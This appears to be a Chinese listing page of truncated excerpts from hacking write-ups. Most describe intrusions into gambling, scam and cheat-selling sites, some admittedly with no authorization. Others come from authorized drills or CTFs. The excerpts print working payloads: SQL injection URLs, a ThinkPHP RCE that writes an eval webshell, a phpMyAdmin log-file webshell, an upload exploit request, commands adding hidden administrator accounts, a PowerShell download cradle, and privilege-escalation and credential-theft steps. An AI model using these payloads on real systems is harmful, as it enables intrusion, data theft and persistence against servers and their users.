红队攻击面相关讨论

0x01 前言 提示：当个反面案例看就好，实际上拿下的方式远没有下文说的那么麻烦，只怪自己太心急… 本来是之前BC项目搞下来的一个推广站，当时只拿到了Shell 权限是一个普通用户，想提权进一步收集服务器上的信息时，发现运行各种东西都是权限拒绝，提示组策略阻止了这个程序，当时因为还有的别的事情，就没继续研究了（项目已获得有关部门授权，用户名比较敏感，后面全程打码）。 0x02 Bypass Applocker 最近突然想起来了，就继续搞一下，问了下群里的师傅 知道是什么东西以后就好说了，耐心找一找总会有收获的，附上Applocker介绍： https://baike.baidu.com/item/Applocker/2300852?fr=aladdin然后就找到3g师傅的一篇文章： https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/具体怎么利用就自行看文章吧，看完文章后续的大概思路差不多就清晰了 0x03 上线到提权 我想的是bypass applocker让目标服务器执行我的马子上线后在进行后续的提权，然而Shell下执行 net user、tasklist /SVC等等都没得回显，不然可以通过进程对比判断下杀软（自己写的小轮子，目前可匹配进程已经增加到960+了：http://get-av.se7ensec.cn/） 既然不知道，那我就拼一拼人品，赌一下主机里没有杀软，通过上面3g师傅文章…

这站真大，不对，这站真圆.php的站随便随便一测 一枚注入 因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20# 舒服了，这下可以给光明正大的进去选内衣了 0x02 拿shell 看看robots.txt inurl:a.com admin 进入后台发现是ECSHOP 这里原本是file改为image绕过 似乎不行被重置了 这里发现可以执行sql语句而且存在绝对路径泄露 ok下面就好说了，写入一句话 0x03 提权 权限有点小低 存在mysql也没其他可以利用的 尝试mysql提权 除了目录不能上传其他条件都满足所以当我没说，上cs,powershell上线 提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接 然后我们在以system权限执行powershell shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-objec…

获取phpmyadmin弱口令 通过信息收集到彩票站点的ip为xxx，探测扫描发现存在phpmyadmin，通过猜测，使用默认弱口令(root/root)登入到phpmyadmin当中。 通过phpmyadmin后台sql查询写入shell到日志文件 使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。 流程和命令如下: 1、开启日志功能：set global general_log=on; 2、点击phpmyadmin变量查看日志文件名字: 这里的日志文件是test.php。 3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>'; 4、执行成功返回。 5、查看日志文件。 6、菜刀连接添加用户并且上传mimikatz。 使用菜刀连接日志文件木马，xxx/test.php 密码:test 查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add 上传mimikataz到服务器当中。 7、3389连接，读取管理员密码。 （1）、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。 （2）、或者这里在菜刀上执行以下命令查询3389开放的端口…

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建开着80，那就访问一下：从官网查找客服软件的教程。发现后台路径为：/admin直接访问果然发现：想也没想，直接admin：123456，没想到的是进去了哈哈哈：下一步当然是getshell，找了一圈发现直接可编辑语言配置文件：这里使用简单的一句话还给我封了ip丫的，看了一眼竟然用云盾，这骗子还有点安全意识，那只好祭出我的哥斯拉杀器（直接带bypass function的，也好用对不）：好家伙，禁用的函数如此之多，那行吧，绕过呗文件管理时发现限制目录读取： 直接使用哥斯拉的目录访问绕过： 最后目录浏览时发现php存在多个版本，本人php5提权不太熟悉(哥斯拉不适用哈哈)，看见php7后果断找其他站点：访问其他站点都能访问，解析ip都是这个，终于发现一个php7的 终于发现一个php7的，但是linux版本内核很新啊，看来提权是个麻烦 而后不出所料，哥斯拉的函数绕过可执行命令：执行后直接获取低权限shell： 是www用户，权限很低。 在目录下还发现了一个杀猪盘工具：框框 可以一键生成诈骗详情链接： （现在大家知道不要相信qq微信交易的重要性了吧，这种杀猪盘很容易坑人） 最后根据收集到的数据库链接等信息准备进数据库里看一眼，哥斯拉的链接有问题： 于是搭建frp到骗子服务器访问： 信息： 由…

0x00 偶遇一棋牌网站1、简单的抓包分析一下 2、用户名后边加单引号直接报错了，闭合之后又正常了，稳稳地sql注入一枚。 3、通过测试没有发现任何安全设备，直接上sqlmap。 4、过程就不啰嗦了，直接得到下边数据 current-user: developer@% select @@BASEDIR: '/usr/' select USER(): '[email protected]' select DATABASE(): 'edc' select SYSTEM_USER(): '[email protected]' select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/' select @@CHARACTER_SET_CLIENT: 'utf8' select @@DATADIR: '/var/lib/mysql/' select @@CHARACTER_SET_SERVER: 'latin1'5、通过一波信息收集，当前用户权限很低，有用的信息少得可怜 6、对目标端口进行扫描,发现端口开了挺多 7、打开80端口没有任何页面 888 端口 是apache默认首页 得到绝对路径 /var/www/html/ 9090 端口 是赌博站管理登录地址 9091 端口 是赌博站会员登录地址 8、经过测试，这个两个页面没有可利用的漏洞 0x01 突破点1、通过对目录进行扫描发现一个报错页面，得到一个注入点还得到一个info.php 2、拿到数据库ro…

某天挖 edu 挖到自闭，然后想着 fofa 一下，看看有没有什么好玩的站点 好家伙，居然还真有这种商城，原谅我孤陋寡闻了。于是乎，想进去学习了一下 首先，进行了一下初步的信息收集 基本上都是伪静态的，没有什么发现可以明显判断其网站后端语言的地方在搜索框点击搜索后 可以发现这个地址并不能帮助我们判断该站的类型但也要尝试一下SQL注入 然后直接被 Ban IP了，索性放弃对这个地方的继续研究，继续翻找其他功能点。当我们点击订单查询时 可以发现Url 产生了变化 跳转到了登录注册页面，既然来都来了，注册一个看看有没有其他业务，黑不走空，哈哈哈 昵称处尝试打 Xss，发现也会被 Ban IP，那就先放一下，找找有没有什么业务逻辑漏洞吧。尝试购买一些商品，之前一直听说支付漏洞，但弟弟从没有真正遇到过，碰碰运气吧 点击购买，抓包发现 cookie 中出现了一个奇怪的参数 我们拿去urldecode 一下，看看是什么东西 那就猜测一下，可以看到前面应该是价格，后面是购买的个数，我们先改一下 编码回去，覆盖发包 因为在 cookie 里，所以传过去的每个数据中的 cookie 都要改 可以发现，我们的单价变为了 1，数量为 10，总额变为了 10，记录一下参数之间对应的关系 提交订单，修改cookie内的值，然后继续，页面跳转到了支付宝付款页面 点开支付宝，发现价格的确发生改变 没错，75元的商品，只需要17元即可支付，但是商家发不发货就不晓得了 意外惊喜 然后，我…

初遇难题发现一个bQc站先尝试打一下主站先尝试目录扫描看能不能发现一些后台之类的，这里我用的是dirsearch。但是很遗憾，没有什么有价值的目录，连后台也扫不出来，但是这是在意料之中，毕竟大部分菠菜网站防护都做的挺好的。接下里尝试注册一个账号看看尝试注入，发现加密，不会逆向的我只能暂时放弃。注册成功后发现一个上传接口上传成功但是查看后发现他是以id的形式存储，无法形成上传漏洞放弃。这个网站拿不下来转换思路尝试对整个ip进行渗透，首先要对这个ip的全端口进行扫描，尽量获取到比较全的信息。获得了两个web页面。rocketmq，这个有最新版漏洞爆出来尝试找到工具尝试攻击，但是失败不能执行命令。还有另外一个登录界面发现存在shiro框架尝试爆破但是未发现秘钥。柳暗花明突破点：他有一个8888端口，访问都会跳转非法ip看了一下burp发现他会访问登录页面再进行跳转眉头一皱发现事情并不简单，在ip后随便加了一点，导致其报错，发现其使用的是spring框架。Actuator 是 Spring Boot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。Actuator 的核心是端点 Endpoint，它用来监视应用程序及交互，spring-boot-actuator 中已经内置了非常多的 Endpoint（health、info、beans、metrics、httptrace、shutdown等等），同时也允许我们自己扩展自己的 Endpoints。每个 Endp…

前言在一个风和日丽的下午，我们正在Blank的带领下，兴致勃勃地讨论着，女人。 而float先生发现了一个访问了他博客的奇怪IP。 哎，根本不把什么网络安全法放在眼里，直接就开打。 Game Start浏览器访问会直接跳登陆界面。 信息收集路径上敲个X。拿到ThinkPHP和版本号。 同时，float先生nmap扫到801端口，并确定是宝塔建站。不过这里没有进一步研究。 RCE尝试5.0.21能直接RCE，且payload满天飞。不过依然遇到了一点小坑。 模块名不是通常的index，而且必须存在。根据跳转登录的uri： /admin/login/index.html 猜测module为admin，果然成功。 disable_functions赫然在列，则rce果然不成功。 种马好消息是写文件成功了。 访问shell.php，看到phpinfo界面。 反手就写冰蝎马连它。 趁机瞅了瞅，贷款、经理、业务员、bc...好，继续打。 连接数据库硬编码还真是宇宙难题，数据库密码到手。 第一次遇到MySQL的密码里有@，直接写会破坏连接串。如： mysql://root:[email protected]:3306/mysql password中的@会提前走到ip:端口的判断。需要把它编码为%40 管理员登录翻web目录和代码实在没有进展了，尝试登录一下系统。 数据库里有账号口令，当然口令是加盐的哈希。 谁家好人头铁非要暴密码出来，直接patch下login代码，不查表就完事了。 登录系统。 这业…

从某个大哥手里拿到一个菠菜得day，是一个任意文件上传得0day，通过任意文件上传获取到webshell，但是扫描端口能看到开启了宝塔。 然后就出现了下面的问题。 使用哥斯拉的bypass插件可以执行命令。 用户为WWW，宝塔的默认用户，接下来就是常规操作，提权、SSH登陆拿宝塔。 先进行提权，上传脏牛然后看能够使用的提权exp。 运行之后使用CVE-2021-4034进行提权，先把EXP文件上传到菠菜服务器。 反弹shell，然后进入exp文件夹编译运行即可获取到root权限。 获取到root权限之后就办事了，创建账户、赋权限即可。反弹的shell因为vim不了，然后就把他passwd文件保存在本地然后第三列给0，这样子登陆在之后就是root。 创建的账户是ftpp，然后保存为passwd文件上传到web目录，使用提权后的root权限先删除passwd然后在copy过去即可。 因为这个服务器有宝塔控制面板，所以先进入/www/server/panel/data,这个文件夹里面有一个default.db文件，这个是宝塔的配置数据文件。保存在本地之后修改他的宝塔密码，登陆即可。然后在结束之后记得把db数据文件还原回去，这样他的密码还是原来的密码。 然后修改密码登陆即可。 通过登陆可以看到站点的完整信息，还有数据库密码，web目录，还有他的手机号，但是手机号只有前三后四，中间四位是*号，之前查手机号的办法也没用了，其实打到这里就可以，交给警察叔叔抓人就可以了。 转自于原文链接： https://mp.…

前言本文仅用于交流学习， 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 渗透测试可分为三个阶段 信息收集 尽可能的收集所有关的资产信息确定测试范围 漏洞发现 针对收集的资产进行进一步的漏洞检测 漏洞利用 针对发现的漏洞进行进一步的利用以及利用的程度 1.js中的api接口 2.多端口形站点3.客服系统钓鱼引导等4.积分系统针对脆弱的旁站5.充值接口6.找源代码分析某演示站泄露的源码白盒分析 7.bc后台根于js资源url,子域,等多种方式找一般小站大多是自域前加 ad ag admin 123admin ht等等 转载于原文链接： https://mp.weixin.qq.com/s/ZGNKIkfOidLPpjT856LHxw

0x01 漏洞描述 网络dubo是指通过互联网手段（非法dubo网站、菠菜App、微信群等）进行的赌博活动。由于网络dubo不合法，资金不受法律保护，有很多“出老千”的行为，很多人被骗后往往不敢报警，导致家破人亡，所以打击dubo，刻不容缓。某菠菜系统系统存在任意文件上传漏洞，攻击者通过漏洞可以上传木马文件，导致服务器失陷。 0x02 漏洞复现 fofa：body="main.e5ee9b2df05fc2d310734b11cc8c911e.css" 1.执行POC，上传冰蝎马，返回上传路径 POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documen…

逛QQ空间刷到了 于是有了下文。打开站点，很贴心，前台后台都可以进。 下面说漏洞点 sql注入，有一套程序基于某个模板二开，正好我手里有这套模板且审计过。所以轻松拿下。 无任何过滤，直接注即可。 任意文件上传 这个我怀疑是开发自己留的后门。 看得懂的人一眼就看出来了。直接本地新建表单提交即可。 但是目标站有个问题，上传不回显路径，应该是注释了echo。本地搭建测试， 上传文件名修改为这个格式。 思路：本地复现upload，然后和远程同时提交，同一个时间点，返回的文件名应该是一样的。 测试: 复现成功。 点到为止。 另求教各位精通php审计的大佬 这段代码可否有利用点。 尝试各种截断始终无法执行php代码。 转载于原文链接： https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ

一、案例1因为最近吃鸡被外挂打自闭了，所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台 你们这些卖挂的，等我有空了一个一个捶。 发现大多数都是用的一套aspx的程序，可惜没有源码不能白盒审计，黑盒也找不到什么洞 只能找找软柿子捏，昨天晚上一口气锤了四个 基本上都有宝塔 不过php-venom 4 系列加上配套的编码器过宝塔稳得一批 脱了裤子发现里面4000+数据 今天晚上又锤了一个吃鸡外挂站 可惜尴尬的是没有写入权限 写篇大水文记录一下 1. 无套路进后台 这个应该算是那种推广站，里面什么都没有，只有宣传内容 管你是什么，照锤不误。 看了一下是织梦二次开发的站 后台很容易进，这里大家都明白什么意思。 2.玄学后台发现后台删了很多功能，特别是织梦的坑货文件管理器 但是从经验上来说很多这种二次开发的并不是真的把编辑器删掉了，只是在后台页面不显示了。 审查元素启动 随便找个链接改一下，替换成media_main.php?dopost=filemanager 然后点击，果然找到了文件管理器页面 上传shell 本来以为就这样结束了 结果发现虽然提示上传成功但是啥都没有 还以为是waf，就换了人畜无害的一张jpg上去也是啥都没有 以为是目录权限问题 找到session的临时文件，上传，照样不行 图就不放了，总之就是传不上去 觉得可能是整站没写权限 随手试试删除功能，发现可以删文件 emmmmm，所以到底是有权限没有呢 一般来说没写权限的话也就没有修改权限，也就是没有删除权限 想着…

我们找到一个带有有漏洞的QP后台框架的后台 这个框架有很多的漏洞，比如用户遍历，我们如果输入一个存在的用户，密码错误时，就会提示用户或密码错误，如果我们输入一个不存在的用户，就会提示用户不存在 除此之外，网站还会存在SQL注入漏洞，我们只需要抓一个提交账号密码的POST包 粘贴好一个txt文档然后丢进sqlmap， 是mssql，我们可以开启xp_cmdshell，这里我们打算写入webshell，所以先os-shell判断出路径（超级慢） 然后利用xp_cmdshell写入webshell 成功上线 然后我打算上线cs进行下一步操作，尝试了web传递，但是被杀软拦住了 很烦，没办法，只能尝试免杀上线，这里我用的免杀方法是分离免杀 生成payload，然后写一个shellloader并且base64编译一下 我把shellcode放到了vps上 把shellloader上传到目标 一，二，三上线！ 没错，低权用户，多次尝试提权都不成功，最后还是sweetpotato拿下了 拿到了我最爱的system 添加用户 net user admin$ admin@123 /add添加到管理员组 net localgroup administrators test /add直接3389连接 拿到远程桌面本来打算fscan扫一下的，但是发现内网的ip和平常不一样，扫了一下发现出现很多主机，于是判断这是一个vps，故渗透到此为止。 转载于原文链接： https://mp.weixin.qq.co…

0X00 歪打正着 无意间碰到一套垃圾菠菜网站杀猪盘 挨个访问能扫描出来的目录与文件发现并没有太大作用，不过发现了后台地址。phpmyadmin访问500。 访问xd.php到后台访问发现还需要授权验证码 试了下8888，123456之类的都提示错误，当场关闭。 尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。返回首页发现url有点不常见。 0X01 寻找同类型网站以及源码这种搞诈骗的很少会开发肯定源码是从网上下载找人搭建的，不常见就是特征，于是搜索了下。 0X02 开始审计这么多网站那源码肯定烂大街了，于是花了点时间找到了源码，尝试审计。 下载回来源码用seay扫描下，源码又太大我也懒得去本地搭建，直接用源码对着目标进行怼。 从中发现了个fileupload.php文件好像有点问题。 访问目标发现也存在该文件。把该文件提取出来到本地搭建的环境中做测试。 直接访问会自动创建出upload和upload_tmp两个文件夹，这玩意是个demo这个点其实看起来更像个后门。 并且filename变量完全是可控的。 继续往下看发现一些判断，可以表单上传名就为file。文件上传 其他的就不用管了，直接改个上传表单。只要加上参数name和file就行了。 name参数控制上传文件名为aaa.php 选择1.jpg上传 上传后没有返回路径但是在upload下已经存在aaa.php文件。 SQL注入 变量中where的值又是来自request中，并且上面的checkinput中也没有检测type的…

0x00 前言打开链接，发现是一个luo聊的app下载，夜神+burp抓包 获取到网址，通过js的文件特征去github查找源码文件根据代码发现他是一个kjcms，然后去官网下载源码来进行审计0x01 sql注入在cls_weixin::on_exe方法中，有许多执行sql语句的点这里注入需要满足$arr_msg[‘FromUserName’]可控，发现$arr_msg变量调用了当前类的get_msg()方法，跟进这个方法：static function get_msg() { $arr_return = array(); $cont = file_get_contents("php://input"); //$cont = file_get_contents(KJ_DIR_ROOT . "/test.txt"); if(empty($cont)) return $arr_return; $request = simplexml_load_string($cont , 'SimpleXmlElement' , LIBXML_NOCDATA); $arr_return = fun_format::toarray($request); return $arr_return;}发现$cont是通过post数据流获取的，传入的xml，继续跟进fun_format::toarraystatic function toarray($cont) { if(gettype($cont) == "strin…

最近偶然发现一个虚拟货币买涨跌的杀猪盘，遂进行了一波测试，前台长这样。 为thinkphp5.0.5随用RCE进行打入，成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7)) 查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数，且com和dl加载都不能用无法执行相应的系统命令如下所示： assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open //php如上系统命令都已禁用 但有文件的读写权限没有禁用assert()，file_put_contents()等函数，查看后发现为windows系统如下所示： 由于php执行系统命令的函数都被禁用了，从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波，发现其管理员cookie固定且可以伪造如下所示看着像后门： 故可后台登录绕过，管理员cookie固定，添加cookie字段即可登录绕过。浏览器f12，在cookie中添加上述键值访问index，即可成功后台登录如下所示好多钱(被骗的人好多)： 前台询问客…

0x00 前言随着菠菜类违法站点的肆虐，让无数人妻离子散。为此，献上一份微薄之力，希望能给“有关部门”提供一些帮助。今天给大家表演的是收割BC天恒盛达。 0x01 程序介绍程序采用PHP5.4 + MySQL 程序结构如下 基本上目前做此类违法站点的不法分子，除了外包以外就是天恒、大发几套程序模改的。暂时，这边由于技术水平上面的问题，只能够发出天恒的。版本可能有点老。但是，一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测，大约70%的存在这些问题，而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。 0x02 漏洞详情1、money - SQL注入 web\wjaction\default\PayOnlineBack.class.php 继续跟进money，此处为GET获取，接着看条件 条件展示，第一个为Key验证，这个在配置文件里。如果Key错误则表示所有订单都无法生效。也就是说Key肯定是在URL请求内，这个验证即可绕过。 继续看条件，这里是生成一个MD5值进行校验。但是这种校验是有缺陷的，此处并未把key的值带入进去。所以我们直接提交的时候，把$tno.$payno.$money都设为空。那么我们将获取$md5key的MD5值。因为$sign在URL中能展示出来。解密后，我们再按照他的验证机制就可以写脚本，进行注入了。 往下继续看，交易号随机来就行了。 继续看，最后一个验证。这里的用户名肯定是真实的，所以这里的验证就算是废掉了 接下来，根据前面的分析，就可…

Kerberos认证流程前言本文主要分享最近学习的关于域内Kerberos认证的一些攻击手法，以自我的理解为主，从原理理解切入到基本工具利用来阐述，个人的理解分析较为啰嗦，嫌太兀长的可以跳着看就好，还请各位谅解。如有错误，请师傅们提出更正 对于Kerberos认证流程只是简单的描述带过，下面有很多细节没有说明，比如PAC，S4U2SELF(委派)，S4U2PROXY(委派)等。详细的解读推荐翻阅daiker师傅写的相关文章 本文主要环境利用的是红日靶场VulnStack 域控 owa win2008R2 192.168.52.138域主机 sut1 win7 192.168.52.130域外主机 k0uaz win7(可访问到域控) 192.168.52.162主要涉及主体和角色Domain Controller 域控制器，简称DC，一台计算机，实现用户、计算机的统一管理Key Distribution Center 秘钥分发中心，简称KDC，默认安装在域控里，包括AS和TGSAuthentication Service 身份验证服务，简称AS，用于KDC对Client认证Ticket Grantng Service 票据授予服务，简称TGS，用于KDC向Client和Server分发Session Key(临时秘钥)Active Directory 活动目录，简称AD，用于存储用户、用户组、域相关的信息。Client 客户端，指用户。Server 服务端，可能是某台计算机账户，也可能是某个服务。过程和原理 上图中涉及到了三个请求返回过程…

0x00 前言刚结束某地HVV，小程序作为低成本易用的信息化系统，成为HVV新型重点突破对象。以下案例均来自于小程序，供大家学习。 0x01 案例一 某政务系统1.弱口令进入后台点击小程序，进入公民办事，抓到小程序域名，访问直接是管理员后台，如下页面即为Fastadmin框架 。 一直有个坑，登录一直显示口令无效，在我要放弃的时候，点击返回上一步提醒我，您已登录，我纳闷了，发现该系统登陆操作后token会刷新，导致下一次登录必须使用上一次token，否则口令无效。因此应该是网络或系统本身有延时，导致未成功使用正确token进行登陆操作，当发现这个问题的时候我已经admin/123456登进了后台。 内包含数据近20000条公民信息，以及管理员账户几百个，且所有管理员账户中的账户名密码均为admin/123456。与地级市HVV | 未授权访问合集中的案例四系统情况类似。（码死） 2.到处都是SQL注入前台业务处如下包，debug没有关导致爆出来数据库账户名密码，这个SQL注入太明显了，但此时我处在数据库账密的喜悦中没有搞SQL注入，可是这个数据库不对外，只能本地连接，烦死了。 后台查看管理员的时候存在延时注入 3.命令执行拿下服务器和数据库既然是fastadmin，那有很多拿shell的方法，这次是用在线命令插件漏洞写入PHP Webshell，该漏洞只在1.1.0可用。 但是这个系统是二开的，根本找不到插件的地方，在网上搜罗了一下拼接找到插件页面。 目录为：/addon?ref=addtabs 那该插件的目录就应该是/ad…

一、MISC 1.sudoku_easy 简单的数独交互，几个小注意点，每次发送level之后sleep5秒才会返回题目 将形如 --------------------- 800103720 023840650 410006008 300001062 000052407 072060090 160000375 205019846 000030000 --------------------- 转换成二维数组进行解数独，并将返回结果重新转换成多行字符串形式 def parse_input(input_list): board = [] for row in input_list: nums = list(map(int, row)) board.append(nums) return board def format_output(board): formatted = "" for row in board: formatted += "".join(map(str, row)) + "\n" return formatted.strip() 一开始以为每次获得5分，要拿到120分，range了24次，一直出问题，后来发现获得分数是递增的，同时调试了一下发现拿到120分会返回一个getshell，因此修改一下range7次 最终脚本: def find_e…

Re Emoji Connect 是Excel的插件，开始玩之后会初始化一个4848的矩阵，每个格子里有一个emoji，然后每次点击两个格子，如果两个格子里的emoji相同，就会消除这两个格子。一开始以为是消星星一类的三个格子的消除，但看game的逻辑每次只替换两个，所以确实是连连看。然后flag的逻辑就是每次消除的时候减去格子的 行列，下标是用神奇的方法从unicode转过去的，我这里直接用矩阵里emoji的最小值做下标偏移了 dat = '''😈 😑 😔 😎 😌 😆 😤 😮 😮 😟 😪 😂 😢 😐 😩 😙 😭 😎 😬 😅 😉 😦 😛 😥 😜 😤 😑 😨 😝 😗 😛 😁 😑 😏 😜 😠 😤 😋 😀 😁 😅 😖 😑 😡 😒 😇 😄 😛 😊 😈 😂 😘 😬 😩 😥 😬 😈 😫 😅 😊 😒 😦 😑 😅 😙 😔 😟 😩 😬 😐 😑 😮 😔 😥 😧 😖 😇 😦 😉 😈 😘 😯 😣 😉 😓 😞 😃 😌 😨 😖 😮 😙 😙 😫 😋 😣 😜 😉 😇 😮 😝 😞 😒 😪 😂 😬 😯 😃 😄 😘 😪 😛 😤 😑 😦 😯 😗 😋 😡 😤 😊 😨 😉 😬 😍 😏 😨 😔 😝 😀 😡 😝 😅 😧 😋 😔 😨 😗 😍 😨 😝 😈 😫 😤 😍 😍 😌 😅 😫 😏 😫 😗 …

日常流程简要说明入口权限 => 内网搜集/探测 => 免杀提权[非必须] => 抓取登录凭证 => 跨平台横向 => 入口维持 => 数据回传 => 定期权限维护 0x01 入口权限获取 [ 前期侦察，搜集阶段本身就不存在太多可防御的点，非防御重心 ]1.绕CDN找出目标所有真实ip段(1).通过全国多个PING，查看IP地址是否唯一来判断是否存在CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2).通过之前的DNS绑定历史记录来查找真实IP地址https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3).通过获取多个子域名，并批量对多个子域名进行ping，可判断该子域名的IP段就是真实IP段（主站用了CND，而子域名分站不用Cdn解析）Layer子域名挖掘机/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(…

前言前段时间参加了一场攻防演练，使用常规漏洞尝试未果后，想到不少师傅分享过从JS中寻找突破的文章，于是硬着头皮刚起了JS，最终打开了内网入口获取了靶标权限和个人信息。在此分享一下过程。 声明：本次演练中，所有测试设备均由主办方提供，所有流量均有留档可审计，所有操作均在授权下完成，所有数据在结束后均已安全销毁。 通过JS打点开局只有一个登录页面，无法枚举用户名并且尝试爆破未果。 利用bp抓包查看JS相关文件发现存在sql语句 跟踪comboxsql变量，发现定义了一个action类 搜索这个action类路径，发现访问方式是通过url拼接 将该路径进行拼接，并将参数输入sql语句，测试发现该数据库为mssql数据库，可通过xp_cmdshell来执行系统命令。 shellcodeloader上线CS执行system权限后，打算直接使用远程下载上线免杀cs，但是未上线成功，查看进程发现有360企业云，触发拦截了执行exe行为。 换种思路，通过下载哥斯拉webshell后，利用哥斯拉的shellcodeloader功能，加载自己CS木马的shellcode可上线成功。 解密数据库配置信息因执行任何exe文件时，均提示拒绝访问，无法进行文件的运行，通过搜索本机配置文件发现了数据库的账号密码，但是数据库密码加密了 通过查找历史网站备份文件，发现的该系统早期配置文件并未做数据库密码加密配置，测试发现可以连接数据库。 另外查找本系统数据库备份文件时，意外发现了该服务器部署的另一套业务系统，并且数据库配置文件中的账号、密码…

前言由客户授权的一次攻防演练，从外网钓鱼到内网遨游，也算是幸不辱命，攻击路径绘制了流程图，接下来会按照我画的攻击流程图来进行讲解，流程图如下： 外网钓鱼首先外网收集相关信息，添加微信，构造与客服业务相对 应的话术，诱导对方点击木马，过程如下图： 客服成功上线如下图： 然后对该企业的总监同样实施微信钓鱼，构造的话术为商务合作，诱导对方点击木马如下： 同样上线： 内网遨游登陆相关系统翻阅客服终端，发现密码本，成功登陆邮箱系统，发现大量内部办公邮件如下： 通过密码本登陆运营平台，发现2000w+记录如下： 同时还发现该运营系统存在SQL注入如下： 使用sqlmap获取数据库用户密码如下： 通过密码本登陆Zabbix系统如下： 发现某源码，开审！翻阅另一台终端文件时，发现了一个压缩包为install.zip,解压查看，发现为某系统源码： 语言为PHP如下: 审计源码发现该系统后台插件添加处存在任意文件上传漏洞，通过添加插件的方式对向服务器中写入webshell获取到多台服务器权限。 重点在Build()函数里 直接把请求的config数据写入到插件目录下的config.php文件中了，如下： burp构造数据包发包： 解析成功，getshell如下： 通过此0day拿下多台服务器权限如下： 掌控云上资产通过前面控制的机器，在其中一台机器中，翻阅配置文件，找到数据库账号密码，登陆数据库在其中一个表中发现了AK/SK如下： 可以接管阿里云所有系统： 拿下gitlab通过linux历史记录获取到gitlab后台权…